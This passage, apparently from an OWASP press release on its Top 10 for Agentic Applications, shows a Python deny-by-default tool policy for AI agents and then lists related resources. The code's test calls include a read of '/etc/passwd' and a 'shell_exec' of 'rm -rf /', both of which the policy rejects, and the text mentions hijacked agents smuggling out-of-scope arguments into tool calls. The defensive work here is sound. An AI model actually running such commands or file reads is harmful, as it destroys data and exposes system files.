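    allowed_tools: set = field(default_factory=set)
    # Per-tool argument validators: reject calls whose arguments exceed
    # what this agent is authorized to do.
    validators: dict = field(default_factory=dict)

    def authorize(self, tool: str, args: dict) -> bool:
        if tool not in self.allowed_tools:
            return False  # unknown or unlisted tool: deny by default
        check = self.validators.get(tool)
        return bool(check(args)) if check else True

policy = ToolPolicy(
    allowed_tools={"read_file", "send_email"},
    validators={
        # Only allow reads inside the agent's sandbox directory.
        "read_file": lambda a: a.get("path", "").startswith("/sandbox/"),
        # Only allow mail to the organization's own domain.
        "send_email": lambda a: a.get("to", "").endswith("@example.com"),
    },
)

print(policy.authorize("read_file", {"path": "/sandbox/report.txt"}))  # True
print(policy.authorize("read_file", {"path": "/etc/passwd"}))          # False
print(policy.authorize("shell_exec", {"cmd": "rm -rf /"}))             # False
```

The deny-by-default stance is the key design choice: a hijacked agent that invents a new tool call, or smuggles an out-of-scope argument into a permitted one, is stopped before the call executes rather than after.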
The Top 10 for Agentic Applications joins a growing portfolio of peer-reviewed resources released by the OWASP GenAI Security Project and its Agentic Security Initiative, including:
The State of Agentic Security and Governance 1.0: A practical guide to the governance and regulations for the safe and responsible deployment of autonomous AI systems.
The Agentic Security Solutions Landscape: A quarterly, peer-reviewed map of open-source and commercial agentic AI tools and how they support SecOps and mitigate DevOps–SecOps risks.
A Practical Guide to Securing Agentic Applications: Practical technical guidance for securely designing and deploying LLM-powered agentic applications.
Reference Application for Agentic Security: An OWASP FinBot Capture the Flag application, designed to test and practice agentic security skills in a controlled environment.
Agentic AI Threats and Mitigations: This document is the first in a series to provide a threat-model-based reference of emerging agentic threats and discuss mitigations.
And more
"Over the past two and a half years, the OWASP Top 10 for LLM Applications has shaped much of the industry's thinking on AI security," said Steve Wilson, OWASP GenAI Security Project Board Co-Chair, Founder of OWASP Top 10 for LLM, and CPO of Exabeam, Inc. "This year, we've seen agentic systems move from experiments to real deployments, and that shift brings a different class of threats into clear view. Our team met that challenge by expanding our guidance to address how agentic systems behave, interact, and make decisions. The LLM Top 10 will remain a core, regularly updated resource, and aligning both efforts is key to helping the community build safer, more reliable intelligent systems."
Discover what industry experts, researchers and leading global organizations have to say about the new Top 10 for Agentic Applications here.
The OWASP GenAI Security Project invites organizations, researchers, policymakers and practitioners to access the new Top 10 for Agentic Applications, contribute to future updates and join the global effort to build secure, trustworthy AI systems. Visit our site to learn more and how you can contribute.
About OWASP Gen AI Security Project
The OWASP Gen AI Security Project (genai.owasp.org) is a global, open-source initiative and expert community dedicated to identifying, mitigating, and documenting security and safety risks associated with generative AI technologies, including large language models (LLMs), agentic AI systems, and AI-driven applications. Our mission is to empower organizations, security professionals, AI practitioners, and policymakers with comprehensive, actionable guidance and tools to ensure the secure development, deployment, and governance of generative AI systems. Visit our site to learn more.